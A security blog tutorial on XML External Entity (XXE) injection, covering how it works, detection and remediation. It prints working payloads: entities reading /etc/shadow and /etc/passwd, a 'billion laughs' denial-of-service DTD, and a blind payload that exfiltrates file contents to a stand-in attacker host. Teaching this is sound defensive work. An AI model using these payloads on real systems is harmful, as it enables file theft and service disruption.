From:https://www.gracefulsecurity.com/xml-external-entity-injection-xxe-vulnerabilities/
Here’s a quick write-up on XXE, starting with how to detect the vulnerability and moving on to how to fix it! XXE is a vulnerability in the way that XML parses handle user input and if an attacker is able to enter arbitrary or crafted data into an XML parser they may be able to inject entities and this could leave to file disclosure, denial-of-service attacks or in rare cases – code execution!
Extensible Markup Language (XML) is a widely deployed information
exchange format. Actually, it’s a meta markup language that allows
developers to describe information as it is transferred or stored. It’s
generally both human readable and machine readable. It’s useful for data
serialisation but generally a lot bulkier than alternatives such as
JSON.
So let’s jump right in and take a look at a little XML:
XXE: Basic XML Example
<!--?xml version="1.0" ?--> <userInfo> <firstName>John</firstName> <lastName>Doe</lastName> </userInfo>
The first line forms what is called the Document Type Definition, or DTD,which supplies information about the document that is to follow including any entities (we’ll talk about these in a second) and the version of XML that is being used (generally 1.0, but 1.1 supports international characters sets like the Chinese and Cyrillic alphabet).
Within the DTD is also where we can create “entities”, these are similar to variables in programming languages but a lot simpler. Essential it’s where a developer can store (or retrieve) information that is used later in the document, sort of like a find-replace. Everywhere the parser sees the entity used it’ll replace it with the content the developer asked for. So utilising a simple entity for the above XML we can re-write the same document like this:
XXE: Entity Example
<!--?xml version="1.0" ?--> <!DOCTYPE replace [<!ENTITY example "Doe"> ]> <userInfo> <firstName>John</firstName> <lastName>&example;</lastName> </userInfo>
Now when the document is parsed and used &example; will be replaced with Doe. So entities are defined within the DTD, which is like a document header, and used in the document body in a sort of, find-replace manner. This is a really simple example of using entities to add content into an XML document, but you can even pull in file-contents. This could be used to attack a vulnerable application and smuggle out sensitive data! Here’s an example:
XXE: File Disclosure
<!--?xml version="1.0" ?--> <!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/shadow"> ]> <userInfo> <firstName>John</firstName> <lastName>&ent;</lastName> </userInfo>
That above example aims to read the file that contains Linux passwords. If you’re application is vulnerable and running with high privileges then this is bad news as it will embed the content of the file within the XML document once it’s parsed! If you’re only a lower privileged use you could always try pulling /etc/passwd instead of /etc/shadow as that file is world-readable. It contains usernames too which could benefit an attacker. If you’re hosted on a Windows server, try C:Windowswin.ini that file doesn’t contain any sensitive data but it’s a file found on every Windows server and it’s world-readable too, so it’ll prove the existence of this issue.
There are a few simple ways that an attacker can cause a denial-of-service attack against a vulnerable XML parser, a simple method would be to attempt to read a data stream instead of a file, such as trying to disclose the contents of /dev/zero or /dev/urandom on a Linux system. This will supply a constant stream of data to the parser and tie up all of its resources.
Further to the above there is also the idea of entity unpacking, which is performed through the use of Parameter Entities. Entity unpacking is caused by nesting multiple references to other entities in the DTD and when this is done by an attacker the parser will then recursively unpack all of these references and this can cause a large amount of memory to be used as the string grows exponentially. If an attacker can craft an entity that uses all of the system memory a denial-of-service can be caused as the system may run out of memory and crash!
XXE: Denial-of-service Example
<!--?xml version="1.0" ?--> <!DOCTYPE lolz [<!ENTITY lol "lol"><!ELEMENT lolz (#PCDATA)> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol; <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> <tag>&lol9;</tag>
Whilst this may at first seem innocuous, the reference to &lol9; within the tag at the bottom references a line of text which itself is ten “lols” long, each one of those references a string ten times longer again and on and on until the string becomes unmanageably long!
XXE: Detecting Vulnerable Parsers
So finding this vulnerability on your systems is fairly simple – the conditions that are supposed to be fulfilled for a system to be vulnerable is the ability for the attacker to write into the DTD and for External Entities to be enabled (they are enabled by default on many parsers), however the author has seen implementations that didn’t follow the standards and therefore at attacker could define entities outside of the DTD! So a better method to detect this issue is to utilise the “XXE: Entity Example” as a test payload (the part highlighted in blue) and if the system parses this payload and replaces the entity given with the string given in the entity definition then the ability to define entities is possible, so one criteria is there. To test for the second criteria you can modify your test payload so that it’s like the example given in “XXE: File Disclosure” and attempt to locate some known files (/etc/password and c:Windowswin.ini are good options) if you see the content of the file within your parsed XML output then the system is vulnerable!
Update: Blind XXE
I’ve seen it documented a few times that it’s only possible to exploit XML External Entity Injection if the entity is reflected back in the application at some point, however that’s not true and I’ve personally exploited blind injection. It’s a touch awkward but pretty simple, an attacker can leverage Parameter Entities to dynamically build a URL and request it. That way it’s possible to load the contents of a file and append it to a URL pointing to a server controlled by the attacker and effectively deliver the file contents to that server! All this without anything needing to be displayed within the application itself.
This attack comes in two parts, the first is to similar to the file disclosure proof-of-concept above, however you’ll notice that it uses a PE to load a remote file
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ENTITY % pe SYSTEM "http://tester.example.com/xxe_file"> %pe; %param1; ]> <foo>&external;</foo>
That file should contain the following:
<!ENTITY % payload SYSTEM "file:///etc/passwd"> <!ENTITY % param1 "<!ENTITY external SYSTEM ‘http://tester.example.com/log_xxe?data=%payload;‘>">
So if we break this attack down, first of all the payload itself loads in the DTD the file xxe_file which should be stored on an attacker controlled server. The file the instructs the XML parse to first load the contents of the file /etc/passwd (which contains system usernames on Linux and is world readable; try something like C:Windowswin.ini on Windows). The parser takes the contents and appends them to the end of a URL pointing at an attacker controlled website – the file log_xxe doesn’t actually have to exist, as the web server will log the GET request for the file either way!
So an attacker places the entity in the vulnerable application, the parser loads the xxe_file and builds a URL dynamically that contains the contents of the target file, it sends that request (including the target file) to the attacker’s web server where they can simply pull the stolen file contents out of the server logs! All blind, no need for contents to be displayed in the application itself!
Remediation
So how do we fix this issue? Luckily the fix can be pretty straight forward: If External Entities aren’t required then disable them! If that’s not possible then sanitization of user input is the next options, that is to encode user input in such a way that entities cannot be defined through user input, in this case the recommendation would be to take dangerous characters (&, <, >,”, and ; would be a good place to start) and HTML Entity encode them as they are process and displayed. This shouldn’t have any effect on legitimate users who wish to use these characters as they’ll still render correctly in a browser but any attacker trying to use these characters to attack your applications will be unable to!